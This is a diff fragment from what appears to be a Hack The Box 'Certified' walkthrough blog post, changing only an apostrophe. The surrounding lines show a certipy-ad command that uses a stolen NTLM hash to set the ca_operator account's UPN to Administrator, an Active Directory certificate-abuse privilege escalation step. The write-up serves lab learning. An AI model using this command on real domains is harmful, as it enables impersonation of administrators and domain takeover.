bloodstiller/bloodstiller.com/content/Walkthroughs/Certified-box.md

     -   `certipy-ad account update -username management_svc@$domain -hashes :$svcHash -user ca_operator -upn Administrator`
         -   {{< figure src="/ox-hugo/2024-11-06-131853_.png" >}}
     -   +Note+:
-        -   We're omitting the domain for `ca_operator` to make actions appear as if they’re performed by `Administrator`.
+        -   We're omitting the domain for `ca_operator` to make actions appear as if they're performed by `Administrator`.
         -   This reassigns the identity so that future actions will appear as if `ca_operator` is the `Administrator`.